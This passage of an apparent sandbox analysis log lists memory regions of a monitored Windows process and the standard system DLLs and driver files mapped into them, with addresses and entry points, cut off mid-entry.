"\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3552 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3553 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3554 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3555 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3556 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3557 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3558 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3559 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3560 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3561 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3562 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3563 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3564 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3565 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3566 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3567 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3568 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3569 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3570 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3571 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3572 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3573 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3574 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3575 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3576 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3577 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3578 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3579 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3580 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3581 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3582 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3583 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3584 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3585 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3586 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3587 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3588 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3589 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3590 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3591 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3592 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3593 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3594 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3595 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3596 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3597 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3598 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3599 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3600 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3601 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3602 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3603 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3604 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3605 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3606 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3607 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3608 start_va = 0xd70000 end_va = 0xd97fff monitored = 0 entry_point = 0xd71860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3609 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 3610 start_va = 0xd70000 end_va = 0xd97fff monitored = 0 entry_point = 0xd71860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3611 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 3612 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3613 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3614 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3615 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3616 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3617 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3618 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3619 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3620 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3621 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3622 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3623 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3624 start_va = 0x120000 end_va = 0x12dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3625 start_va = 0x130000 end_va = 0x13dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3626 start_va = 0x120000 end_va = 0x12dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3627 start_va = 0x130000 end_va = 0x13dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3628 start_va = 0x120000 end_va = 0x12dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3629 start_va = 0x130000 end_va = 0x13dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3630 start_va = 0x11f0000 end_va = 0x1fe4fff monitored = 0 entry_point = 0x12d3268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3631 start_va = 0x11f0000 end_va = 0x1fe4fff monitored = 0 entry_point = 0x12d3268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3632 start_va = 0x11f0000 end_va = 0x1299fff monitored = 0 entry_point = 0x1204100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3633 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3634 start_va = 0x11f0000 end_va = 0x1299fff monitored = 0 entry_point = 0x1204100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3635 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3636 start_va = 0xe30000 end_va = 0xe77fff monitored = 0 entry_point = 0xe6fd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3637 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3638 start_va = 0xe30000 end_va = 0xe77fff monitored = 0 entry_point = 0xe6fd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3639 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3640 start_va = 0x11f0000 end_va = 0x12d8fff monitored = 0 entry_point = 0x12c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3641 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3642 start_va = 0x11f0000 end_va = 0x12d8fff monitored = 0 entry_point = 0x12c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3643 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3644 start_va = 0x11f0000 end_va = 0x12d8fff monitored = 0 entry_point = 0x12c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3645 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3646 start_va = 0x11f0000 end_va = 0x12d8fff monitored = 0 entry_point = 0x12c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3647 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3648 start_va = 0x11f0000 end_va = 0x13effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3649 start_va = 0x13f0000 end_va = 0x153cfff monitored = 0 entry_point = 0x14f2a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3650 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3651 start_va = 0x13f0000 end_va = 0x153cfff monitored = 0 entry_point = 0x14f2a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3652 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3653 start_va = 0x120000 end_va = 0x12efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3654 start_va = 0xe30000 end_va = 0xe89fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3655 start_va = 0x120000 end_va = 0x12efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3656 start_va = 0xe30000 end_va = 0xe89fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3657 start_va = 0x120000 end_va = 0x12ffff monitored = 0 entry_point = 0x12a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 3658 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name 